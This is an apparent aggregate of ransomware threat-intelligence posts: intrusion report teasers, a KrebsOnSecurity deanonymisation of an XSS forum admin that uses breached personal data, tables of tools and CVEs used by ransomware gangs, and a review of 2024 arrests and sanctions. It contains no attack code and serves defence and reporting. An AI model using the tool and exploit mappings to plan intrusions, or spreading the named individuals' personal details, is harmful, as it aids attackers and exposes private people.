Key Takeaways An audio version of this report can be found on Spotify, Apple, YouTube, Audible, & Amazon.  This intrusion began in mid-February 2024 after a threat actor exploited a vulnerability (CVE-2023-46604) on an exposed Apache ActiveMQ server. The threat actor was able to perform remote code execution (RCE) by using a Java Spring class and a custom Java Spring […]

The post Apache ActiveMQ Exploit Leads to LockBit Ransomware appeared first on The DFIR Report.

This report provides the number of affected systems confirmed during January 2026, DLS-based ransomware-related statistics, and notable ransomware issues in Korea and abroad. Below is a summary of some information.   The statistics on the number of ransomware samples and affected systems were based on the diagnostic names assigned by AhnLab, and the statistics on ransomware-affected […]

This report provides the number of affected systems confirmed during December 2025, DLS-based ransomware-related statistics, and notable ransomware issues in Korea and abroad. Below is a summary of some information.   The statistics on the number of ransomware samples and affected systems are based on the diagnostic names assigned by AhnLab. Please note that the […]

On July 22, 2025, the European police agency Europol said a long-running investigation led by the French Police resulted in the arrest of a 38-year-old administrator of XSS, a Russian-language cybercrime forum with more than 50,000 members. The action has triggered an ongoing frenzy of speculation and panic among XSS denizens about the identity of the unnamed suspect, but the consensus is that he is a pivotal figure in the crime forum scene who goes by the hacker handle “Toha.” Here’s a deep dive on what’s knowable about Toha, and a short stab at who got nabbed.

Europol did not name the accused, but published partially obscured photos of him from the raid on his residence in Kiev. The police agency said the suspect acted as a trusted third party — arbitrating disputes between criminals — and guaranteeing the security of transactions on XSS. A statement from Ukraine’s SBU security service said XSS counted among its members many cybercriminals from various ransomware groups, including REvil, LockBit, Conti, and Qiliin.

Since the Europol announcement, the XSS forum resurfaced at a new address on the deep web (reachable only via the anonymity network Tor). But from reviewing the recent posts, there appears to be little consensus among longtime members about the identity of the now-detained XSS administrator.

The most frequent comment regarding the arrest was a message of solidarity and support for Toha, the handle chosen by the longtime administrator of XSS and several other major Russian forums. Toha’s accounts on other forums have been silent since the raid.

Europol said the suspect has enjoyed a nearly 20-year career in cybercrime, which roughly lines up with Toha’s history. In 2005, Toha was a founding member of the Russian-speaking forum Hack-All. That is, until it got massively hacked a few months after its debut. In 2006, Toha rebranded the forum to exploit[.]in, which would go on to draw tens of thousands of members, including an eventual Who’s-Who of wanted cybercriminals.

Toha announced in 2018 that he was selling the Exploit forum, prompting rampant speculation on the forums that the buyer was secretly a Russian or Ukrainian government entity or front person. However, those suspicions were unsupported by evidence, and Toha vehemently denied the forum had been given over to authorities.

One of the oldest Russian-language cybercrime forums was DaMaGeLaB, which operated from 2004 to 2017, when its administrator “Ar3s” was arrested. In 2018, a partial backup of the DaMaGeLaB forum was reincarnated as xss[.]is, with Toha as its stated administrator.

CROSS-SITE GRIFTING

Clues about Toha’s early presence on the Internet — from ~2004 to 2010 — are available in the archives of Intel 471, a cyber intelligence firm that tracks forum activity. Intel 471 shows Toha used the same email address across multiple forum accounts, including at Exploit, Antichat, Carder[.]su and inattack[.]ru.

DomainTools.com finds Toha’s email address — toschka2003@yandex.ru — was used to register at least a dozen domain names — most of them from the mid- to late 2000s. Apart from exploit[.]in and a domain called ixyq[.]com, the other domains registered to that email address end in .ua, the top-level domain for Ukraine (e.g. deleted.org[.]ua, lj.com[.]ua, and blogspot.org[.]ua).

Nearly all of the domains registered to toschka2003@yandex.ru contain the name Anton Medvedovskiy in the registration records, except for the aforementioned ixyq[.]com, which is registered to the name Yuriy Avdeev in Moscow.

This Avdeev surname came up in a lengthy conversation with Lockbitsupp, the leader of the rapacious and destructive ransomware affiliate group Lockbit. The conversation took place in February 2024, when Lockbitsupp asked for help identifying Toha’s real-life identity.

Lockbitsupp didn’t share why he wanted Toha’s details, but he maintained that Toha’s real name was Anton Avdeev. I declined to help Lockbitsupp in whatever revenge he was planning on Toha, but his question made me curious to look deeper.

It appears Lockbitsupp’s query was based on a now-deleted Twitter post from 2022, when a user by the name “3xp0rt” asserted that Toha was a Russian man named Anton Viktorovich Avdeev, born October 27, 1983.

Searching the web for Toha’s email address toschka2003@yandex.ru reveals a 2010 sales thread on the forum bmwclub.ru where a user named Honeypo was selling a 2007 BMW X5. The ad listed the contact person as Anton Avdeev and gave the contact phone number 9588693.

A search on the phone number 9588693 in the breach tracking service Constella Intelligence finds plenty of official Russian government records with this number, date of birth and the name Anton Viktorovich Avdeev. For example, hacked Russian government records show this person has a Russian tax ID and SIN (Social Security number), and that they were flagged for traffic violations on several occasions by Moscow police; in 2004, 2006, 2009, and 2014.

Astute readers may have noticed by now that the ages of Mr. Avdeev (41) and the XSS admin arrested this month (38) are a bit off. This would seem to suggest that the person arrested is someone other than Mr. Avdeev, who did not respond to requests for comment.

A FLY ON THE WALL

For further insight on this question, KrebsOnSecurity sought comments from Sergeii Vovnenko, a former cybercriminal from Ukraine who now works at the security startup paranoidlab.com. I reached out to Vovnenko because for several years beginning around 2010 he was the owner and operator of thesecure[.]biz, an encrypted “Jabber” instant messaging server that Europol said was operated by the suspect arrested in Kiev. Thesecure[.]biz grew quite popular among many of the top Russian-speaking cybercriminals because it scrupulously kept few records of its users’ activity, and its administrator was always a trusted member of the community.

The reason I know this historic tidbit is that in 2013, Vovnenko — using the hacker nicknames “Fly,” and “Flycracker” — hatched a plan to have a gram of heroin purchased off of the Silk Road darknet market and shipped to our home in Northern Virginia. The scheme was to spoof a call from one of our neighbors to the local police, saying this guy Krebs down the street was a druggie who was having narcotics delivered to his home.

I happened to be lurking on Flycracker’s private cybercrime forum when his heroin-framing plan was carried out, and called the police myself before the smack eventually arrived in the U.S. Mail. Vovnenko was later arrested for unrelated cybercrime activities, extradited to the United States, convicted, and deported after a 16-month stay in the U.S. prison system [on several occasions, he has expressed heartfelt apologies for the incident, and we have since buried the hatchet].

Vovnenko said he purchased a device for cloning credit cards from Toha in 2009, and that Toha shipped the item from Russia. Vovnenko explained that he (Flycracker) was the owner and operator of thesecure[.]biz from 2010 until his arrest in 2014.

Vovnenko believes thesecure[.]biz was stolen while he was in jail, either by Toha and/or an XSS administrator who went by the nicknames N0klos and Sonic.

“When I was in jail, [the] admin of xss.is stole that domain, or probably N0klos bought XSS from Toha or vice versa,” Vovnenko said of the Jabber domain. “Nobody from [the forums] spoke with me after my jailtime, so I can only guess what really happened.”

N0klos was the owner and administrator of an early Russian-language cybercrime forum known as Darklife[.]ws. However, N0kl0s also appears to be a lifelong Russian resident, and in any case seems to have vanished from Russian cybercrime forums several years ago.

Asked whether he believes Toha was the XSS administrator who was arrested this month in Ukraine, Vovnenko maintained that Toha is Russian, and that “the French cops took the wrong guy.”

WHO IS TOHA?

So who did the Ukrainian police arrest in response to the investigation by the French authorities? It seems plausible that the BMW ad invoking Toha’s email address and the name and phone number of a Russian citizen was simply misdirection on Toha’s part — intended to confuse and throw off investigators. Perhaps this even explains the Avdeev surname surfacing in the registration records from one of Toha’s domains.

But sometimes the simplest answer is the correct one. “Toha” is a common Slavic nickname for someone with the first name “Anton,” and that matches the name in the registration records for more than a dozen domains tied to Toha’s toschka2003@yandex.ru email address: Anton Medvedovskiy.

Constella Intelligence finds there is an Anton Gannadievich Medvedovskiy living in Kiev who will be 38 years old in December. This individual owns the email address itsmail@i.ua, as well an an Airbnb account featuring a profile photo of a man with roughly the same hairline as the suspect in the blurred photos released by the Ukrainian police. Mr. Medvedovskiy did not respond to a request for comment.

My take on the takedown is that the Ukrainian authorities likely arrested Medvedovskiy. Toha shared on DaMaGeLab in 2005 that he had recently finished the 11th grade and was studying at a university — a time when Mevedovskiy would have been around 18 years old. On Dec. 11, 2006, fellow Exploit members wished Toha a happy birthday. Records exposed in a 2022 hack at the Ukrainian public services portal diia.gov.ua show that Mr. Medvedovskiy’s birthday is Dec. 11, 1987.

The law enforcement action and resulting confusion about the identity of the detained has thrown the Russian cybercrime forum scene into disarray in recent weeks, with lengthy and heated arguments about XSS’s future spooling out across the forums.

XSS relaunched on a new Tor address shortly after the authorities plastered their seizure notice on the forum’s  homepage, but all of the trusted moderators from the old forum were dismissed without explanation. Existing members saw their forum account balances drop to zero, and were asked to plunk down a deposit to register at the new forum. The new XSS “admin” said they were in contact with the previous owners and that the changes were to help rebuild security and trust within the community.

However, the new admin’s assurances appear to have done little to assuage the worst fears of the forum’s erstwhile members, most of whom seem to be keeping their distance from the relaunched site for now.

Indeed, if there is one common understanding amid all of these discussions about the seizure of XSS, it is that Ukrainian and French authorities now have several years worth of private messages between XSS forum users, as well as contact rosters and other user data linked to the seized Jabber server.

“The myth of the ‘trusted person’ is shattered,” the user “GordonBellford” cautioned on Aug. 3 in an Exploit forum thread about the XSS admin arrest. “The forum is run by strangers. They got everything. Two years of Jabber server logs. Full backup and forum database.”

GordonBellford continued:

And the scariest thing is: this data array is not just an archive. It is material for analysis that has ALREADY BEEN DONE . With the help of modern tools, they see everything:

Graphs of your contacts and activity.
Relationships between nicknames, emails, password hashes and Jabber ID.
Timestamps, IP addresses and digital fingerprints.
Your unique writing style, phraseology, punctuation, consistency of grammatical errors, and even typical typos that will link your accounts on different platforms.

They are not looking for a needle in a haystack. They simply sifted the haystack through the AI sieve and got ready-made dossiers.

Introduction

This blog is a summary and analysis of recent additions to the Ransomware Tool Matrix (RTM) as well as the Ransomware Vulnerability Matrix (RVM). Feedback from the infosec community about these projects has been overwhelmingly positive and many researchers have contacted me to tell me how helpful they have found these to be. It makes me happy to hear how doing something in my spare time can help stop ransomware attacks and cybercriminals from exploiting our society’s systems. And it is for that reason, I shall continue to maintain these projects as long as ransomware is still around. For anyone new to these projects, please read the descriptions on GitHub or feel free to watch my talk explaining the project at BSides London.

Background on the current ransomware ecosystem as of May 2025

Following the impact of Operation Cronos against LockBit and the exit scam by ALPHV/BlackCat, the ransomware ecosystem has been even more unstable than usual. The exit scams and law enforcement infiltration operations have created a zero trust environment for the cybercriminals participating in the ransomware economy. The days of affiliates putting their faith in one RaaS platform seem to be long gone and many are experimenting and going from one RaaS to the next.

Sources of Threat Intelligence for the RTM

The RTM was updated with OSINT reports shared by cybersecurity researchers at various private service providers or vendors. The thing to remember about these reports is that the tool usage is going to be slightly outdated due to the time it takes incident response teams to wrap up an investigation, compile findings, and publish a report.

From the reports, threat groups such as Qilin, BlackSuit, RansomEXX, Medusa, BianLian, Hunters International and PLAY have been active for over one year or for multiple years. These are established groups. Since RansomHub and LockBit have shut down, it is more likely than not that the affiliates have already shifted to one of the other RaaS platforms, like Qilin, among others.

There has also been a number of ransomware operations suspected to be linked to Chinese cyber-espionage groups, such as RA World (for using PlugX), NailaoLocker (for using ShadowPad and PlugX), and CrazyHunter (for its focus on Taiwan).

Threat groups such as IMN Crew, QWCrypt (linked to RedCurl), NightSpire, SuperBlack, and Helldown are all rising threat groups that have more recently begun their ransomware campaigns.

These factors have led to seeing a large variety of tool usage in ransomware operations being observed across the landscape. The reliance on tools from sites like GitHub and other free software sites, however, continues to remain a constant theme among all of these ransomware operations.

List of sources used for the May 2025 major update to the RTM:

Group Name	Report Publish Date	URL
Qilin	25 April 2025 10 March 2025	redpiranha.net picussecurity.com
IMN Crew	24 April 2025	s-rminform.com
CrazyHunter	16 April 2025	trendmicro.com
RansomEXX	8 April 2025	microsoft.com
BlackSuit	31 March 2025	thedfirreport.com
QWCrypt	26 March 2025	bitdefender.com
RansomHub	26 March 2025 20 March 2025	welivesecurity.com security.com
Medusa	26 March 2025 6 March 2025	welivesecurity.com security.com
BianLian	26 March 2025	welivesecurity.com
PLAY	26 March 2025	welivesecurity.com
NightSpire	25 March 2025	s-rminform.com
Hunters International	19 March 2025	esentire.com
SuperBlack	13 March 2025	forescout.com
LockBit	24 February 2025	thedfirreport.com
NailaoLocker	20 February 2025 18 February 2025	orangecyberdefense.com trendmicro.com
RA World	13 February 2025 22 July 2024	security.com unit42.paloaltonetworks.com
Helldown	7 November 2024	truesec.com

Tools Used by Multiple Groups

• EDRSandBlast and WKTools are relatively new tools that are being used by multiple groups to deactivate and overcome EDR tools that many victims will have on their networks to prevent ransomware attacks.
• Typical ransomware tools, such as PsExec, Mimikatz, and Rclone remain effective and still used by multiple ransomware gangs for the foreseeable future.

Tool	Type	Groups Using It
WinSCP	Exfiltration	NightSpire Hunters International
Mimikatz	Credential Theft	RansomHub Qilin Helldown
Impacket	Offensive Security Tool	RansomHub RA World NailaoLocker
Rclone	Exfiltration	RansomHub Hunters International Medusa
NetScan	Discovery	RansomHub Medusa
WKTools	Discovery	RansomHub BianLian PLAY
Advanced IP Scanner	Discovery	Hunters International BianLian
Advanced Port Scanner	Discovery	Hunters International Helldown
AnyDesk	RMM Tool	Medusa BianLian
EDRSandBlast	Defense Evasion	Medusa Qilin

New Tools Added to the RTM

• The most notable new tools added to RTM include several defense evasion tools for deactivating EDRs, discovery for sensitive files, and tunnelling tools to conceal adversary network connections.

Tool	Type	Groups Usage
Bublup	Exfiltration	BlackSuit
WKTools	Discovery	BianLian, PLAY
AmmyyAdmin	RMM Tool	BianLian
CQHashDump	Credential Theft	NailaoLocker
Throttle Stop Driver	Defense Evasion	Medusa
KillAV	Defense Evasion	Medusa
BadRentdrv2	Defense Evasion	RansomHub
Toshiba Power Driver (BYOVD)	Defense Evasion	Qilin
ZammoCide	Defense Evasion	CrazyHunter
FRP	Networking	Medusa
Stowaway	Networking	RansomHub
Navicat	Discovery	Medusa
Everything.exe	Discovery	NighSpire
RoboCopy	Discovery	Medusa
NPS	Networking	RA World
SharpGPOAbuse	Offensive Security Tool	CrazyHunter
Attrib	LOLBAS	BlackSuit
Curl	LOLBAS	QWCrypt (RedCurl)
PCA Utility (pcalua)	LOLBAS	QWCrypt (RedCurl)

Exploits used by Ransomware Gangs added to the RVM

• As is now usual, multiple ransomware groups have been targeting Fortinet networking devices for initial access into to victim environments.
• Multiple ransomware groups continue to exploit the Windows Common Log File System (CLFS) for local privilege escalation to run hacking tools and steal credentials.
• Other exploits involve targeting edge devices, such as Check Point VPNs or PAN Firewalls, or exposed servers, such as Atlassian Confluence Data Center Servers.
• The targeting of Veeam backup software should come as no surprise as preventing backups or stealing sensitive files, such as Active Directory backups, are key objectives of ransomware gangs to complete their mission.

Ransomware Group	Exploited CVEs
NightSpire	CVE-2024-55591 (FortiOS)
RansomHub	CVE-2022-24521 (Windows CLFS) CVE-2023-27532 (Veeam)
LockBit	CVE-2023-22527 (Confluence)
Hunters International	CVE-2024-55591 (FortiProxy)
SuperBlack	CVE-2024-55591 (FortiProxy)
RA World	CVE-2024-0012 (PAN-OS)
NailaoLocker	CVE-2024-24919 (Check Point VPN)
RansomEXX	CVE-2025-29824 (Windows CLFS)

Conclusion

My recommendation for defenders who continue the fight against ransomware is to take some of the findings from this report and begin threat hunting, detection rule writing, and start blocking some of these tools not present in the environments you are protecting.

Here are a few sites to help you get started with:

• https://rulehound.com/rules
• https://detection.fyi
• https://www.snapattack.com/community

Key Takeaways Case Summary The intrusion started with the exploitation of CVE-2023-22527, a critical remote code execution vulnerability in Confluence, against a Windows server. The first indication of threat actor activity was the execution of system discovery commands, including net user and whoami. Shortly after, the threat actor attempted to download AnyDesk via curl, but […]

The post Confluence Exploit Leads to LockBit Ransomware appeared first on The DFIR Report.

Key Takeaways Case Summary This intrusion began near the end of January 2024 when the user downloaded and executed a file using the same name (setup_wm.exe) and executable icon, as … Read More

 

The scourge of ransomware continues primarily because of three main reasons: Ransomware-as-a-Service (RaaS), cryptocurrency, and safe havens.

• RaaS platforms enable aspiring cybercriminals to join a gang and begin launching attacks with a support system that help extract ransom payments from their victims.
• Cryptocurrency enables cybercriminals to receive funds from victims around the world without the option to freeze or refund them due to the immutable nature of the virtual funds.
• Safe havens are countries that permit cybercriminals to launch attacks without immediate fear of arrest, enabling them to earn vast fortunes through ransomware campaigns.

With these three challenges in mind, law enforcement and governments have a very difficult job to do when it comes to fighting ransomware but fight it they must. In this blog we shall recall what counter-ransomware activities took place in 2024, analyse their effectiveness, and assess how the landscape shall evolve as a result.

A podcast version of this blog is also available here.

Ransomware Operator Arrests and Sanctions

During 2024, there were significant disruption operations by law enforcement and financial authorities targeting individuals behind ransomware campaigns (see the Table below). The main focus of 2024 for Western law enforcement was squarely on the LockBit RaaS and its affiliates as it was the largest and highest earning ransomware operation to date.

Several key players of the ransomware ecosystem were arrested, including the main developer of LockBit ransomware. Interestingly, Russian law enforcement also decided to arrest ransomware threat actors located in Moscow and Kaliningrad as well.

Month	Group(s)	Law Enforcement Activity
February 2024	SugarLocker, REvil	Russian authorities have identified and arrested three alleged members in Moscow of a ransomware gang called SugarLocker.
February 2024	LockBit	The LockBit leak site was seized. Two LockBit affiliates were arrested in Poland and Ukraine. Up to 28 servers belonging to LockBit were taken down.
February 2024	LockBit	Two Russian nationals, Ivan Kondratiev and Artur Sungatov, were sanctioned by the US Treasury for being affiliates of LockBit, among other RaaS.
May 2024	LockBit	Dmitry Khoroshev, the administrator and developer of LockBit was sanctioned by the US Treasury.
May 2024	IcedID, SystemBC, Pikabot, Smokeloader, Bumblebee, TrickBot	European police took down malicious spam botnets that support ransomware campaigns. This resulted in 4 arrests (1 in Armenia and 3 in Ukraine), over 100 servers and 2,000 domains being seized. One of the main suspects earned €69 million by renting out infrastructure sites to deploy ransomware.
June 2024	Conti, LockBit	A Ukrainian national was arrested for supporting Conti and LockBit ransomware attacks as a crypter developer.
August 2024	Reveton, RansomCartel	Maksim Silnikau, a Belarusian national, was arrested in Spain for running Reveton and RansomCartel.
August 2024	Karakurt, Conti	Deniss Zolotarjovs, a Latvian national was arrested and extradited to the US from Georgia for running the Karakurt data extortion gang linked to Conti.
October 2024	Evil Corp, LockBit	The UK, alongside the US and Australia, has sanctioned 16 members of Evil Corp, including Aleksandr Ryzhenkov, Viktor Yakubets, and Eduard Benderskiy.
November 2024	Phobos	Evgenii Ptitsyn, a Russian national, was arrested and extradited to the US from South Korea for running the Phobos ransomware gang.
December 2024	LockBit	Rostislav Panev, a dual Russian and Israeli national, was arrested in Israel for developing LockBit ransomware.
December 2024	LockBit, Babuk, Hive	Mikhail “Wazawaka” Matveev was arrested in Russia for violating domestic laws against the creation and use of malware. He was fined and had his cryptocurrency seized and is awaiting trial.

The ransomware ecosystem has fragmented due to the law enforcement disruptions of the largest players, such as ALPHV/BlackCat and LockBit. In the case of ALPHV/BlackCat, the operators staged a law enforcement takedown as they put up a fake seizure notice as part of an exit scam in March 2024 after the attack on UnitedHealth.

Following these disruptions, some affiliates have migrated to less effective strains or launched their own strains. This includes Akira and RansomHub at the top of the list as well as Hunters International and PLAY.

Cryptocurrency Exchanges Disrupted

During 2024, law enforcement seized funds from and sanctioned a number of cryptocurrency exchanges and individuals running payment processors using cryptocurrency (see the Table below).

One of the most interesting disclosures this year came from the UK National Crime Agency (NCA) around Operation Destablise. The NCA linked payments to ransomware gangs to money laundering networks used by Russian oligarchs to covertly purchase property and Russia Today, the state-run media organization, to covertly fund pro-Russia foreign entities.

Another notable investigation in 2024 was when the US Treasury sanctioned more Russian cryptocurrency exchanges, such as PM2BTC and Cryptex, that led to money launderers that facilitate the cashing out of ransom payments being arrested by Russian law enforcement.

Month	Exchange(s)	Law Enforcement Activity
August 2024	Cryptonator	The US Justice Department indicted Russian national Roman Pikulev and Cryptonator, which processed a total of $1.4 billion in transactions, of which $8 million were ransom payments. Cryptonator also has ties to other sanctioned entities including Blender, Hydra Market, Bitzlato, and Garantex, among others.
September 2024	PM2BTC, Cryptex, UAPS	FinCEN identified PM2BTC as being of “primary money laundering concern” in connection with Russian illicit finance. This was alongside Cryptex and Sergey Sergeevich Ivanov, a Russian national, who is associated with UAPS and PinPays, as well as Genesis Market. Cryptex also facilitated more than $115 million of proceeds from ransomware payments.
September 2024	47 exchanges	In Operation Final Exchange, German federal police (BKA) shut down 47 cryptocurrency exchange services that ransomware gangs use that operated without requiring registration or identity verification.
October 2024	Cryptex, UAPS	Russian authorities have arrested nearly 100 suspected cybercriminals linked to the anonymous payment system UAPS and the cryptocurrency exchange Cryptex.
November 2024	Smart, TGR Group	The NCA uncovered a Russian money-laundering network operated by two companies called Smart and TGR Group as part of Operation Destabilise that involved UK-based cash-to-crypto networks that laundered Ryuk ransom payments as well as the money of Russian oligarchs and Russia Today.

Safe Havens Enabling Ransomware

While ransomware is a global problem, there are only a few countries that are to blame for this rapid expansion of the ransomware ecosystem. The state that is blamed the most for preventing many ransomware operators from facing justice is Russia. There are explicit rules posted to Russian-speaking cybercrime forums that state as long as members avoid targeting Russia and the Commonwealth of Independent States (CIS), they are free to operate.

The Russian ransomware safe haven theory was further proven following sanctions levied against Evil Corp by the UK, US, and Australia. One of the sanctioned men connected to Evil Corp was Eduard Benderskiy, a former Russian federal security service (FSB) official. Benderskiy is reportedly the father-in-law of Maksim Yakubets, the leader of Evil Corp, an organized cybercrime group responsible for multiple ransomware strains including BitPaymer, WastedLocker, Hades, PhoenixLocker, and MacawLocker. In total, Evil Corp has reportedly extorted at least $300 million from victims globally, according to the UK NCA. It is now clear that Evil Corp has protection from a highly connected Russian FSB official who has also been involved in multiple overseas assassinations on behalf of the Kremlin, according to Bellingcat investigators.

While a number of ransomware operators were arrested in 2024 and some were extradited to the US, the work done by law enforcement specializing in cybercrime was put in the spotlight during the August 2024 prisoner swap. Multiple countries decided to release cybercriminals, spies and an assassin as part of a historic prisoner exchange with Russia at an airport in Ankara, Turkey. The US negotiated the release of 16 people from Russia, including five Germans as well as seven Russian citizens who were political prisoners in their own country.

Notably, from a cybercrime intelligence perspective, the Russian nationals released from the West included the infamous cybercriminals Roman Seleznev and Vladislav Klyushin. The latter, Klyushin, was sentenced in 2023 to nine years in US prison after he was caught in a $93 million stock market cheating scheme that involved hacking into US companies for insider knowledge. The other cybercriminal, Seleznev, was sentenced to 27 years in prison in 2017 for stealing and selling millions of credit card numbers from 500 businesses using point-of-sale (POS) malware and causing more than $169 million in damage to small businesses and financial institutions, including those in the US.

In 2024, we saw several more Russian nationals get extradited to the US after being arrested by law enforcement in the country they were residing in. This includes the Phobos operator living in South Korea and the LockBit developer living in Israel. This follows others arrested in previous years such as a TrickBot developer arrested in South Korea as well as the two LockBit affiliates extradited to the US. There is a potential that these Russian nationals involved in ransomware could be used in prisoner exchanges in the future.

Further, another curious trend in 2024 was that some Russians inside Russia, which is firmly considered a safe haven for ransomware gang, did get arrested. This includes the SugarLocker operators arrested in Moscow and the LockBit affiliate Wazawaka who was arrested in Kaliningrad. This is alongside the money launderers arrested around Russia linked to the Cryptex exchange.

The arrests of Russian nationals in Russia for ransomware activities appear to be more symbolic than a true crackdown on this type of activity. This is because there are several dozen Russian-speaking ransomware gangs that continue to operate, as well as a plethora of other types of cybercrime in the Russian-speaking underground.

Outlook

In 2024, there was lots of significant action by law enforcement to shake up the ransomware economy. One of the main successes of the notable Operation Cronos action taken against LockBit was the sowing of distrust and disharmony in the ransomware ecosystem. Despite the admins of LockBit trying to recover, their reputation and army of affiliates have been smashed.

Many of Russian law enforcement activities could all be related to the costs of the Russian invasion of Ukraine. Russian authorities seizing funds of the illicit cryptocurrency exchanges could be to pay for the war in Ukraine and they could be recruiting arresting cybercriminals for offensive cyber operations related to the war in Ukraine. The true motivations of Russian law enforcement arresting these specific ransomware operators but allowing others to operate are unclear. The cybercriminals could also simply have not paid their protection money or lack connections in the FSB like Evil Corp has.

Due to the fall of LockBit and ALPHV/BlackCat in 2024, there has been a rise of other ransomware groups like RansomHub and Akira to fill the vacuum. However, the rate of attacks by these emerging groups is still noticeably lower than when LockBit was operating at full force. This should be perceived as a success for law enforcement operations in 2024 due to the overall number of ransomware attacks lowering, which we should all be thankful for.